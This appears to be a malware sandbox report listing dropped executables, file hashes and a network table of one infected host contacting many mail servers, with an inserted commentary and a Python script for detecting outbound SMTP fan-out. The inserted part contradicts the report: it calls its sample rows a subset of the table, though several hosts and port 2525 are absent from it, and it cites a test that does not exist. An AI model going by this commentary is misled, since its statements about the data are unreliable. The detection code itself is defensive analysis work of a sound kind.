"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.6.300588055\2014769721" -childID 5 -isForBrowser -prefsHandle 4192 -prefMapHandle 4196 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78747322-58cb-47c8-ae37-fd689bb247b0} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 4180 1f641a58 tab
C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe
"C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe"
C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 500
C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | secure.nba.com | udp |
| NL | 142.250.27.27:465 | ASPMX.L.GOOGLE.COM | tcp |
| NL | 142.250.27.27:587 | ASPMX.L.GOOGLE.COM | tcp |
| US | 8.8.8.8:53 | bft.fr | udp |
| US | 8.8.8.8:53 | securesmtp.peche95.fr | udp |
| US | 8.8.8.8:53 | mail.cnh.com | udp |
| US | 198.208.74.205:587 | gm.com | tcp |
| US | 68.232.204.104:465 | mail.newscorp.com | tcp |
| GB | 2.18.66.74:587 | secure.nba.com | tcp |
| US | 146.47.242.5:465 | mail.cnh.com | tcp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | mail.muntzer.fr | udp |
| US | 8.8.8.8:53 | securesmtp.elderecho.com | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | mail.libaro.it | udp |
| US | 8.8.8.8:53 | out.comcast.html | udp |
| US | 8.8.8.8:53 | smtp.520zh.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| IT | 81.88.48.101:465 | mail.muntzer.fr | tcp |
| ES | 91.142.210.2:465 | securesmtp.elderecho.com | tcp |
| US | 8.8.8.8:53 | out.janai.com.au | udp |
| US | 8.8.8.8:53 | mail.enginehead.net | udp |
| DE | 142.251.9.26:465 | alt1.aspmx.l.google.com | tcp |
| US | 8.8.8.8:53 | smtp.belden-cd.com | udp |
| US | 8.8.8.8:53 | xerox.com | udp |
| US | 13.8.148.11:587 | xerox.com | tcp |
| US | 8.8.8.8:53 | securesmtp.cavtel.net | udp |
| US | 8.8.8.8:53 | out.yahh.fr | udp |
| US | 8.8.8.8:53 | secure.ratbaggames.com | udp |
| US | 8.8.8.8:53 | secure.deltalearns.ca | udp |
| DE | 64.190.63.222:587 | out.yahh.fr | tcp |
| IE | 91.136.8.160:587 | mail.enginehead.net | tcp |
| BR | 187.6.211.40:587 | oi.com.br | tcp |
| NL | 84.116.6.3:587 | mail.ziggo.nl | tcp |
| US | 8.8.8.8:53 | sale.cz | udp |
| US | 8.8.8.8:53 | securesmtp.fairfaxmortgage.com | udp |
| US | 8.8.8.8:53 | out.fwalter.fr | udp |
| US | 8.8.8.8:53 | PUNGKOOKID.COM | udp |
| CZ | 217.198.114.185:465 | sale.cz | tcp |
| US | 8.8.8.8:53 | home.com | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | smtp.synchrony.com | udp |
| US | 8.8.8.8:53 | smtp-in.sfr.fr | udp |
| US | 8.8.8.8:53 | campolympia-com.mail.protection.outlook.com | udp |
| FR | 93.17.128.123:587 | smtp-in.sfr.fr | tcp |
| US | 52.101.194.0:587 | campolympia-com.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | aon.at | udp |
| US | 8.8.8.8:53 | cg14.fr | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 8.8.8.8:53 | securesmtp.gnaul.com | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| AT | 193.81.82.81:587 | aon.at | tcp |
| US | 8.8.8.8:53 | unitedavg-com.mail.protection.outlook.com | udp |
| US | 8.8.8.8:53 | smtp.student.aru.ac.uk | udp |
| US | 8.8.8.8:53 | mail.dreamhouse.info.pl | udp |
| US | 3.18.7.81:587 | securesmtp.gnaul.com | tcp |
| US | 52.101.8.42:587 | unitedavg-com.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | out.sdlweb.pt | udp |
| BR | 168.0.132.203:587 | smtp.ig.com.br | tcp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| US | 8.8.8.8:53 | mail.cottonwoodmedical.com | udp |
| US | 8.8.8.8:53 | out.ministryhome.org | udp |
| US | 8.8.8.8:53 | lineone.net | udp |
| US | 8.8.8.8:53 | securesmtp.uhaglobal.us | udp |
| US | 8.8.8.8:53 | secure.hockeycurve.com | udp |
| GB | 212.74.99.30:587 | lineone.net | tcp |
| US | 8.8.8.8:53 | smtp.lunarian.site | udp |
| US | 8.8.8.8:53 | out.tecro.us | udp |
| US | 8.8.8.8:53 | securesmtp.cofi.com | udp |
| US | 8.8.8.8:53 | kongju.ac.kr | udp |
| US | 8.8.8.8:53 | smtp.kw02studios.com | udp |
| US | 8.8.8.8:53 | edu.unisinos.br | udp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| KR | 203.253.33.69:465 | kongju.ac.kr | tcp |
| US | 35.237.212.184:587 | home.com | tcp |
| US | 8.8.8.8:53 | mail.vd-p.com | udp |
| US | 8.8.8.8:53 | securesmtp.mqegrmd.com | udp |
| US | 8.8.8.8:53 | hamblecolege.co.uk | udp |
| NL | 142.250.27.27:587 | ASPMX.L.GOOGLE.COM | tcp |
| US | 8.8.8.8:53 | abv.bg | udp |
| US | 8.8.8.8:53 | secure.butogrbf.pl | udp |
| US | 8.8.8.8:53 | cluster1.us.messagelabs.com | udp |
| BG | 194.153.145.104:587 | abv.bg | tcp |
| US | 67.219.250.212:465 | cluster1.us.messagelabs.com | tcp |
| US | 8.8.8.8:53 | mail.gp-h84608.nhs.uk | udp |
| US | 8.8.8.8:53 | secure.proton.me | udp |
| US | 8.8.8.8:53 | emotic.fr | udp |
| US | 8.8.8.8:53 | securesmtp.esasd.net | udp |
| US | 8.8.8.8:53 | mmelaholdings.net | udp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| FR | 213.186.33.5:465 | emotic.fr | tcp |
| US | 8.8.8.8:53 | mail.ricoh.fr | udp |
| FR | 194.206.228.42:587 | mail.ricoh.fr | tcp |
| ZA | 196.40.97.162:587 | mmelaholdings.net | tcp |
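The rows above show one sandboxed host resolving dozens of unrelated mail servers through 8.8.8.8 and then opening TCP sessions to them on the submission ports 465, 587 and 2525, while returning repeatedly to a single HTTPS endpoint. The report does not say whether the sample is validating stolen mailbox credentials or relaying spam; either way, a workstation submitting mail to many providers in many countries within a few minutes is a shape worth alerting on. The following Python is an added example, not part of the report or of any of the listed malware families: it parses rows in the table's own layout (a subset of the rows above, embedded as sample input), counts distinct SMTP destinations and countries, pairs DNS lookups with the connections that followed, and applies a fan-out threshold. The thresholds and function names are our choices, not something the report defines.

```python
"""Flag outbound SMTP fan-out in a sandbox connection table.

Added example, not part of the sandbox report: SAMPLE_ROWS is a subset of
the report's network table; the parser and the heuristic are ours.
"""
from __future__ import annotations

from dataclasses import dataclass

# Ports a client uses to submit mail. 25 is included for completeness;
# this sample used 465, 587 and 2525 only.
SMTP_PORTS = {25, 465, 587, 2525}
DNS_RESOLVER = "8.8.8.8"

# Sample input: rows copied from the table above, in the report's own
# "| CC | ip:port | host | proto |" layout (DNS rows carry the queried name).
SAMPLE_ROWS = """
| US | 8.8.8.8:53 | smtp.shaw.ca | udp |
| US | 8.8.8.8:53 | citromail.hu | udp |
| CA | 64.59.136.142:587 | smtp.shaw.ca | tcp |
| DE | 167.99.248.199:587 | citromail.hu | tcp |
| CZ | 77.75.79.222:587 | seznam.cz | tcp |
| NL | 142.250.27.27:465 | ASPMX.L.GOOGLE.COM | tcp |
| PT | 193.136.173.7:2525 | mail.ua.pt | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
| US | 96.102.167.164:587 | smtp.comcast.net | tcp |
"""


@dataclass(frozen=True)
class Conn:
    country: str
    ip: str
    port: int
    host: str
    proto: str


def parse_rows(text: str) -> list[Conn]:
    """Parse pipe-delimited rows; lines that do not have four cells are skipped."""
    conns = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            continue
        country, endpoint, host, proto = cells
        ip, _, port = endpoint.rpartition(":")
        conns.append(Conn(country, ip, int(port), host.lower(), proto.lower()))
    return conns


def smtp_fanout(conns: list[Conn]) -> dict:
    """Summarise outbound mail submission and tie DNS lookups to later connects."""
    smtp = [c for c in conns if c.proto == "tcp" and c.port in SMTP_PORTS]
    hosts = {c.host for c in smtp}
    queried = {c.host for c in conns
               if c.proto == "udp" and c.port == 53 and c.ip == DNS_RESOLVER}
    return {
        "smtp_connections": len(smtp),
        "distinct_smtp_hosts": len(hosts),
        "distinct_countries": len({c.country for c in smtp}),
        "ports": sorted({c.port for c in smtp}),
        "resolved_then_connected": sorted(hosts & queried),
        # TCP destinations that are not mail submission: worth a separate look.
        "non_smtp_hosts": sorted({c.host for c in conns
                                  if c.proto == "tcp" and c.port not in SMTP_PORTS}),
    }


def is_smtp_fanout(summary: dict, min_hosts: int = 5, min_countries: int = 3) -> bool:
    """Heuristic (our thresholds): many unrelated submission servers across
    several countries from one host in one short run."""
    return (summary["distinct_smtp_hosts"] >= min_hosts
            and summary["distinct_countries"] >= min_countries)


if __name__ == "__main__":
    s = smtp_fanout(parse_rows(SAMPLE_ROWS))
    print(s, "fan-out:", is_smtp_fanout(s))
```

On real telemetry the same logic runs over proxy or NetFlow records keyed by source host; a single connection to a corporate relay (the one-row case in the test below) stays below threshold, which is the point of counting distinct hosts and countries rather than raw connections.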
Files
memory/2676-0-0x00000000003F0000-0x00000000006FD000-memory.dmp
memory/2676-1-0x0000000077200000-0x0000000077202000-memory.dmp
memory/2676-2-0x00000000003F1000-0x0000000000451000-memory.dmp
memory/2676-3-0x00000000003F0000-0x00000000006FD000-memory.dmp
memory/2676-4-0x00000000003F0000-0x00000000006FD000-memory.dmp
memory/2676-5-0x00000000003F0000-0x00000000006FD000-memory.dmp
memory/2676-6-0x00000000003F1000-0x0000000000451000-memory.dmp
memory/2676-7-0x00000000003F0000-0x00000000006FD000-memory.dmp
\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
| MD5 | 1565063ca3d43812789fbf960418659e |
| SHA1 | d710ecdf1861e25498d1886f8c2a44f31826fd55 |
| SHA256 | c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978 |
| SHA512 | eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42 |
memory/2676-17-0x00000000003F0000-0x00000000006FD000-memory.dmp
memory/3008-20-0x00000000010B0000-0x000000000156C000-memory.dmp
memory/2676-19-0x0000000006260000-0x000000000671C000-memory.dmp
memory/3008-21-0x00000000010B1000-0x00000000010DF000-memory.dmp
memory/3008-22-0x00000000010B0000-0x000000000156C000-memory.dmp
memory/3008-23-0x00000000010B0000-0x000000000156C000-memory.dmp
memory/3008-25-0x00000000010B0000-0x000000000156C000-memory.dmp
memory/3008-38-0x00000000010B0000-0x000000000156C000-memory.dmp
memory/2728-40-0x0000000000B70000-0x000000000102C000-memory.dmp
memory/2676-42-0x0000000006260000-0x000000000671C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
C:\Users\Admin\AppData\Local\Temp\9D29.tmp\9D2A.tmp\9D2B.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
memory/2088-63-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/2088-64-0x00000000022A0000-0x00000000022A8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d544b7da8f635a6be8dc295c17c4711f |
| SHA1 | 0e46c05779916b73d14cd2d0d10e934430ca0569 |
| SHA256 | af7ef0f3b62608b2653afd37152b57587084d20d7000999ab74b67db036e63a6 |
| SHA512 | 424d347a77945cbc90f355fc1bc7738779b40f88f4a1c0d123b1a0b1efc9978d9daa942da9850d1a0930824b9df5e8e69d55effc75e752641b661e96b8beb346 |
memory/1120-70-0x000000001B6A0000-0x000000001B982000-memory.dmp
memory/1120-71-0x00000000021D0000-0x00000000021D8000-memory.dmp
memory/2728-72-0x0000000000B70000-0x000000000102C000-memory.dmp
memory/2728-73-0x0000000000B70000-0x000000000102C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
| MD5 | a9749ee52eefb0fd48a66527095354bb |
| SHA1 | 78170bcc54e1f774528dea3118b50ffc46064fe0 |
| SHA256 | b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15 |
| SHA512 | 9d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25 |
C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
| MD5 | 07164c5597a4fbd5cf8c5ebcc43fcbd3 |
| SHA1 | d8ffc868f9a36ab2323440bc0a263e2e3e52def3 |
| SHA256 | 2ea53f7442f44cfc2ea88f2b52d6841ec009d4789f67fd002530e4dece4235d3 |
| SHA512 | 87d4f793aee02e5e484588913034caddfab25381a959815c57d0ec2979539c641a25cabe43c917659cc912d851c5d7d7dc64f02a01e541b554b3eedc8e0477d9 |
C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta
| MD5 | 5fe1140fe7799f3ddd9065e8cf8d8314 |
| SHA1 | 82530611dd55531dd853fe5a24ed775c1e47839f |
| SHA256 | 9e0e959f43020acd5c6198fed9df0d2916f87447eb7ad8bb80d92654cabf6b86 |
| SHA512 | 701560baf03365b24832cce3cbd912030724785662159644bdf698f04ed95dc0b7fd710150a4a9cd9a2e5143ef6516b402e8e43605b0876fe3f412be49bed1f2 |
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
memory/2684-131-0x0000000000400000-0x0000000000840000-memory.dmp
memory/296-130-0x0000000004550000-0x0000000004990000-memory.dmp
memory/296-129-0x0000000004550000-0x0000000004990000-memory.dmp
memory/2728-135-0x0000000000B70000-0x000000000102C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd
| MD5 | cedac8d9ac1fbd8d4cfc76ebe20d37f9 |
| SHA1 | b0db8b540841091f32a91fd8b7abcd81d9632802 |
| SHA256 | 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b |
| SHA512 | ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 002b3d7e85131ff95dad29a893a9daf8 |
| SHA1 | beefb76611bef66a06855e778ec9b2c7e76f5245 |
| SHA256 | d5b7340e28da43a4a9e603ea2a290ea7b06407a7db0cc20ae39ef3ce45c50230 |
| SHA512 | 8e7fc27df69faa4f8469eb23b191a41ea02d95f9e2632b7c6c9c520f1a4c21ca3b4737400eb80791f3ebc9db9f20f358382a813fd8cf9283e3fb5b2bfea5190d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 8737598db15a721ca4181da4bed0e8f5 |
| SHA1 | 977201dcf77ff5d6d06e653b4680eb46e4da5679 |
| SHA256 | f52d4d5ed196fc5fa97de28755d46da8734d36a42748d39cce0f13dd17e619b5 |
| SHA512 | a471f0dad042f1d15fb3e6f84a78de56bc904a0a6b90c8e4283553c4a6fc30163a82c3ca1d49a4551c2aa3dad8a501ecc3e210a10e3061b9402abbcb0aeb490d |
memory/2836-171-0x0000000006430000-0x00000000068EC000-memory.dmp
memory/2388-175-0x00000000002A0000-0x000000000075C000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2836-172-0x0000000006430000-0x00000000068EC000-memory.dmp
C:\Temp\VNx3gTICP.hta
| MD5 | 39c8cd50176057af3728802964f92d49 |
| SHA1 | 68fc10a10997d7ad00142fc0de393fe3500c8017 |
| SHA256 | f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84 |
| SHA512 | cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6 |
memory/2388-187-0x00000000002A0000-0x000000000075C000-memory.dmp
memory/296-188-0x0000000004550000-0x0000000004990000-memory.dmp
memory/296-189-0x0000000004550000-0x0000000004990000-memory.dmp
memory/2684-190-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1644-202-0x00000000065F0000-0x0000000006AAC000-memory.dmp
memory/2684-201-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1644-200-0x00000000065F0000-0x0000000006AAC000-memory.dmp
memory/2440-203-0x0000000000990000-0x0000000000E4C000-memory.dmp
memory/2440-204-0x0000000000990000-0x0000000000E4C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe
| MD5 | aa512b143958cbbe85c4fb41bb9ba3fa |
| SHA1 | 46459666d53ecb974385698aa8c306e49c1110ab |
| SHA256 | 8852cc3effc2d3698b05859fa1a18a758b26712263d38ea2de7ef138a31c2b26 |
| SHA512 | 9ab9dbf0d0f7861bf18738d59f03b20f0552461857d4ff3f68d25cc4621f85aaab94050217a1a0c6d3c5a0adb09411a21a6541dcd1042b2a95413c65b2ec0333 |
memory/2728-220-0x0000000006D20000-0x000000000770D000-memory.dmp
memory/2728-221-0x0000000006D20000-0x000000000770D000-memory.dmp
memory/2728-222-0x0000000000B70000-0x000000000102C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe
| MD5 | c83ea72877981be2d651f27b0b56efec |
| SHA1 | 8d79c3cd3d04165b5cd5c43d6f628359940709a7 |
| SHA256 | 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482 |
| SHA512 | d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0 |
memory/2112-236-0x0000000000850000-0x00000000008C8000-memory.dmp
memory/3008-252-0x0000000000400000-0x0000000000465000-memory.dmp
memory/3008-250-0x0000000000400000-0x0000000000465000-memory.dmp
memory/3008-249-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/3008-247-0x0000000000400000-0x0000000000465000-memory.dmp
memory/3008-245-0x0000000000400000-0x0000000000465000-memory.dmp
memory/3008-243-0x0000000000400000-0x0000000000465000-memory.dmp
memory/3008-241-0x0000000000400000-0x0000000000465000-memory.dmp
memory/3008-239-0x0000000000400000-0x0000000000465000-memory.dmp
memory/2728-263-0x0000000006D20000-0x000000000770D000-memory.dmp
memory/2684-264-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2728-265-0x0000000000B70000-0x000000000102C000-memory.dmp
memory/2728-267-0x0000000006D20000-0x000000000770D000-memory.dmp
memory/2796-266-0x0000000001090000-0x0000000001A7D000-memory.dmp
memory/2088-268-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2088-270-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2796-269-0x0000000001090000-0x0000000001A7D000-memory.dmp
memory/2088-274-0x0000000010000000-0x000000001001C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe
| MD5 | 84ada09d9801547265d6589b50051295 |
| SHA1 | fa842424381715851e8d8d716afb27da31edd8c1 |
| SHA256 | a02496bfd7675a37043304198ee5b9efb075376e4ef1509fbbd5e83e190211f6 |
| SHA512 | 4158f0c6409b7b11ee6023b5d295bc77ba3b82de54dd72de08c58bf2521f76ed52167b54395e35929dbb67f857205401eb262cf71c982d7e03823894f1f8037f |
memory/2684-295-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDDDRHWK\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
memory/2728-297-0x0000000000B70000-0x000000000102C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe
| MD5 | 5af71429b3b21c4ecb55d948a04f92a0 |
| SHA1 | 6087f72c97eda7239f4e0631d07d64bfdb7c6ca0 |
| SHA256 | b1c0c3f611c1ee99465613f3045b154c43e1e0f94c1171c55b8c5ff2c4a9285b |
| SHA512 | a27b3cef97bf2d58499df7ae1efafa34684f95b1b76e13c654ba9089ce3869e340e08daa12d83a1b1e2a891cd1a459d44b7a9b33e7593b9bcbb86efc9f17d827 |
memory/2280-313-0x0000000001310000-0x0000000001F43000-memory.dmp
memory/2800-316-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2280-315-0x0000000001310000-0x0000000001F43000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\Tar60AE.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
memory/2684-390-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2728-392-0x0000000000B70000-0x000000000102C000-memory.dmp
memory/1752-394-0x0000000000A00000-0x0000000000E95000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe
| MD5 | 30305d29528f3aca3b09636d919bd512 |
| SHA1 | 4af875a29e249da70f2da3519334af8fd584c193 |
| SHA256 | 015e79df6eee2266ce0fc395c2be08f750970312c9d0e1e6a7cff757ae63f43e |
| SHA512 | a109d05f074d3407c09e66d9bcb2f8dd19811b73b6538b4f92edee17183f22d87faea63b1a09ed831c9c297e6fa729b61d0ad0bf81629f7fb7a08d0288cb04f4 |
memory/2684-413-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2728-416-0x0000000000B70000-0x000000000102C000-memory.dmp
memory/344-417-0x00000000008C0000-0x0000000000BCA000-memory.dmp
memory/2384-419-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2684-423-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2728-426-0x0000000000B70000-0x000000000102C000-memory.dmp
memory/2384-432-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LW44N8OS\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
memory/2728-440-0x0000000000B70000-0x000000000102C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe
| MD5 | afc954940e0fc5ca6bdf390e0033a01c |
| SHA1 | aa0193bc48197c86a7ce3401be6607f0e052a319 |
| SHA256 | 07446af5c75f3b25664b5471d74e5e213eaf7372b14289a98a2c5e8ba01391e8 |
| SHA512 | b1da9863d5427b7ca7a4a33b63bef12cb21faff28e440c053be4034759c94ffb167d9c56f188ff0d6572eebf014b8b4ad928ba7e34229603289f1c5541b80148 |
memory/2384-453-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1124-454-0x0000000001280000-0x0000000001908000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe
| MD5 | 08552f5efe19801cc3fafe356dccd710 |
| SHA1 | 29d2bff1b2ecc298c1cb0a95d3af0de7ee239af9 |
| SHA256 | 16e6372a8712649b3c49c17f6d7103fe6f6a2c6dcf25a2d0759e43b33e2ec0b7 |
| SHA512 | 17457315cdd235ed76d6f607e560784154b4f5a96ccc7ea1165cb62376600bf2a745afe6f4b722e2c3fb028df9b038f636730f2ec9709d78b15d719a7aad5e7d |
memory/2728-479-0x0000000000B70000-0x000000000102C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\5baa7cac-9e65-4bcc-8c21-16ff4b485bf8
| MD5 | 3ebf505728f14089505ae776d2617f90 |
| SHA1 | 5219407902814412ba6b0114c41e530c3a99ffb2 |
| SHA256 | 3d5e2a0e36a6d7d80c792f43e6f45f87d0a4aa4e916a80e6d1402d489e0b912a |
| SHA512 | 1a75c82ccef06516cb6009e409bd8dbfd27c43ae286b9fd8c56ece17ec892487bae100eab067ae3f2c848cfd13e8f91a855269d64e276fae62d298732cd062cb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 58828ad0b120d2dc2cf0e40337d66a9d |
| SHA1 | 681719ea2bf9fe4795fa4b0ce8cc8659a8d72a7d |
| SHA256 | b9fe9bc8fac0b7585a2b3fa24c2926455fbde3c41916af7dc21825b450f65b0d |
| SHA512 | a887db85dbb2e7b30e6084e1ff2dd8f58f0f40aebeddbedc84e8509455f04bd06119bc7f7a33b2b8ae4f0716a0d47d288f586b967be21913485496f3471e40e2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | bece0acf9d7f19d01c7943c54d2ad372 |
| SHA1 | aef59ca4b0fe97f32db128e103bfb98aee3b5e29 |
